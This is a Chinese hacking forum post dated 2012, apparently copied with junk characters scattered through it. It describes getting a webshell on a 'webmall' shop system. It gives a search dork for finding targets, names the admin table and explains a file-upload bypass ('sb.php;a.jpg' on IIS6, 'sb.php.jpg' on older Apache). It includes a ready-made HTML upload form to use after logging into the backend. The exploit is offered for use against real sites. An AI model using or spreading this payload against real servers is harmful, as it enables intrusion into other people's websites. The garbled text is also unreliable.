关键字:inurl:webmall/detail.php?id7 a G& K0 E8 Y ]9 n2 s0 j! R
# v1 c) H7 x. a( d% y3 [5 G' y数据表:pwn_base_admin
" f2 z- n# i6 G" Y# ~3 C2 T0 j% M# a
- i/ R, L$ b z* e4 D4 H6 q+ F关于拿shell; r, X7 ]6 c' l8 E: j7 B' A
- [- r3 j0 p; O% G9 U/ j
首先登录后台admin.php
: e% i9 {+ c' x' t. ] & V) z. N: ~6 Q/ k9 w
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
], c I3 Y' @8 _' ^换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
; G* ]5 V0 u, X- m1 B7 r然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
* c. ]. i* i; Y8 H<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> , { ?" L% |; b, f
<input type="text" name="fileName" value="sb.php;a.jpg" />
# V( G9 j1 V0 v- x0 L<input type="hidden" name="attachPath" value="news/pics/" /> * U( T) I( s9 o
<input type="file" name="fileData" size="14" /></td> ' Q/ J+ V+ i& H t9 G
<input type="submit" name="button" value="确定" /> $ d" Z8 I) u1 E( B: E1 @5 S- z5 s
</form>
4 O9 B4 b1 L* W2 T & ?6 Y" v9 |/ o+ V
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。8 \+ B R/ ?- q! _4 ^
5 [% C3 k( o% T1 H$ i |
发表于 2012-11-9 20:52:15
收藏
支持
反对